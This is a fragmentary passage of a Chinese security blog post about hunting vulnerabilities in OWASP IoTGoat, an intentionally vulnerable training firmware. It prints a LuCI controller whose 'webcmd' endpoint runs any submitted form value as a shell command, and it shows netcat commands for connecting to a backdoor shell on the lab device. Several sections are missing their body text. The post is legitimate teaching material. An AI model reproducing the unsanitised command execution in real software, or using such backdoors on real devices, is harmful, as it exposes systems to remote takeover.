module("luci.controller.iotgoat.iotgoat", package.seeall)
local http = require("luci.http")
function index()
entry({"admin", "iotgoat"}, firstchild(), "IoTGoat", 60).dependent=false
entry({"admin", "iotgoat", "cmdinject"}, template("iotgoat/cmd"), "", 1)
entry({"admin", "iotgoat", "cam"}, template("iotgoat/camera"), "Camera", 2)
entry({"admin", "iotgoat", "door"}, template("iotgoat/door"), "Doorlock", 3)
entry({"admin", "iotgoat", "webcmd"}, call("webcmd"))
end
function webcmd()
local cmd = http.formvalue("cmd")
if cmd then
local fp = io.popen(tostring(cmd).." 2>&1")
local result = fp:read("*a")
fp:close()
result = result:gsub("<", "<")
http.write(tostring(result))
else
http.write_json(http.formvalue())
end
end
admin/iotgoat/cmdinject
admin/iotgoat/cam
admin/iotgoat/door
admin/iotgoat/webcmd
-
admin/iotgoat/cmdinject
-
admin/iotgoat/webcmd
2. 程序后门
$ netstat -antp #查看可疑进程
$ ps | grep shellback
$ nc -v 192.168.72.132 5515
3. Web漏洞
总结
本文始发于微信公众号(山石网科安全技术研究院):系列|OWASP IoTGoat固件漏洞挖掘 03
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论